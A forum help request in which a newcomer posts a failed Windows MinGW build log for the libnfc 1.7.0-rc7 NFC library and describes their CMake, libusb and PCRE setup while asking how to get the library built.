[  3%] Building C object libnfc/CMakeFiles/nfc.dir/nfc-device.c.obj
[  5%] Building C object libnfc/CMakeFiles/nfc.dir/nfc-emulation.c.obj
[  7%] Building C object libnfc/CMakeFiles/nfc.dir/nfc-internal.c.obj
[  8%] Building C object libnfc/CMakeFiles/nfc.dir/conf.c.obj
[ 10%] Building C object libnfc/CMakeFiles/nfc.dir/iso14443-subr.c.obj
[ 12%] Building C object libnfc/CMakeFiles/nfc.dir/mirror-subr.c.obj
[ 14%] Building C object libnfc/CMakeFiles/nfc.dir/target-subr.c.obj
[ 15%] Building C object libnfc/CMakeFiles/nfc.dir/drivers/acr122_usb.c.obj
C:\libnfc-1.7.0-rc7\libnfc\drivers\acr122_usb.c: In function 'acr122_usb_receive
':
C:\libnfc-1.7.0-rc7\libnfc\drivers\acr122_usb.c:587:3: error: 'off_t' undeclared
 (first use in this function)
C:\libnfc-1.7.0-rc7\libnfc\drivers\acr122_usb.c:587:3: note: each undeclared ide
ntifier is reported only once for each function it appears in
C:\libnfc-1.7.0-rc7\libnfc\drivers\acr122_usb.c:587:9: error: expected ';' befor
e 'offset'
C:\libnfc-1.7.0-rc7\libnfc\drivers\acr122_usb.c:630:20: error: 'offset' undeclar
ed (first use in this function)
mingw32-make[2]: *** [libnfc/CMakeFiles/nfc.dir/drivers/acr122_usb.c.obj] Error
1
mingw32-make[1]: *** [libnfc/CMakeFiles/nfc.dir/all] Error 2
mingw32-make: *** [all] Error 2

I tried to repeat the process several time with the same result. What am I doing wrong? because I am using the same process that worked before

Hello everyone. I am a newbie of this API.
I am trying to understand How to use this API on windows, with many problems.
I downloaded:

- libnfc-1.7.0-rc7.tar.gz

-cmake-2.8.10.2-win32-x86 [MinGw-W64]
- tdm-gcc-4.7.1-2
- libusb-win32-bin-1.2.6.0
- pcre-7.0
- doxygen [Cmake told me it was missing]

and using the GUI of CMAKE I selected:

- USB Lib Include: libusb-win32-bin-1.2.6.0/include
- USB Lib library: libusb-win32-bin-1.2.6.0/lib/bcc/libusb.lib
- PCRE Include:C:/Program Files (x86)/GnuWin32/include
- PCRE Lib:C:/Program Files (x86)/GnuWin32/lib/pcre.lib

In the GUI I wrote location of the source code: C:/libnfc-1.7.0-rc7/libnfc-1.7.0-rc7
And where to build the file: C:\BuildNFC

And I receive this output:

Found PCRE: C:/Program Files (x86)/GnuWin32/lib/pcre.lib C:/Program Files (x86)/GnuWin32/include
Found LIBUSB: C:/Users/Dany/Documents/NFC-attacks/libusb-win32-bin-1.2.6.0/lib/bcc/libusb.lib C:/Users/Dany/Documents/NFC-attacks/libusb-win32-bin-1.2.6.0/include
Year for copyright is 2013
Configuring done
Generating done

After this I looked inside of the folder BuildNFC and I found many files but nothing like nfc.dll or ".h" files or ".c" files.

What should I do in order to use this library?

Thank you very much. Sorry for this dummies question but I am working on this problem without find the solution.